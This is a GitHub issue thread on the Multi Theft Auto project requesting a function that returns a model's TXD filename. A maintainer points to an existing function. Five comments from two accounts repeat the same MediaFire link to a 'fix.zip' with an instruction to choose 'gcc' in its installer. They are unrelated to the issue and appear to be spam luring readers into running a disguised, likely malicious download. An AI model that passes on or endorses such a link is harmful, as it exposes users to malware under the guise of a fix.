### ISSUE TITLE
Add engineGetTXDFromModelID

### ISSUE THREAD

**Issue by wassmas** [multitheftauto/mtasa-blue#3677]
### Is your feature request related to a problem? Please describe.

There is no function in MTA
to retrieve the TXD file associated with a specific model ID, making it difficult to manage and work with models and textures efficiently.

### Describe the solution you'd like

 Add a function, like engineGetTXDFromModelID(modelID), that returns the TXD filename for a given model ID.

### Describe alternatives you've considered

Alternatives: Currently, developers must manually reference external tools which is time-consuming and prone to error.

### Additional context

Additional Context: This feature would streamline development, reduce errors, and improve efficiency when working with models and textures in MTA

### Security Policy

- [X] I have read and understood the Security Policy and this issue is not about a cheat or security vulnerability.

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by AlecsSantos** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by diablo00001** [comment]
Download 
https://www.mediafire.com/file/nyekc4ehyxg2ijy/fix.zip/file
In the installer menu, select "gcc."

**Comment by TheNormalnij** [comment]
[engineGetModelTXDID](https://wiki.multitheftauto.com/wiki/EngineGetModelTXDID)

**Comment by wassmas** [comment]
> [engineGetModelTXDID](https://wiki.multitheftauto.com/wiki/EngineGetModelTXDID)

How to get TXD name ?
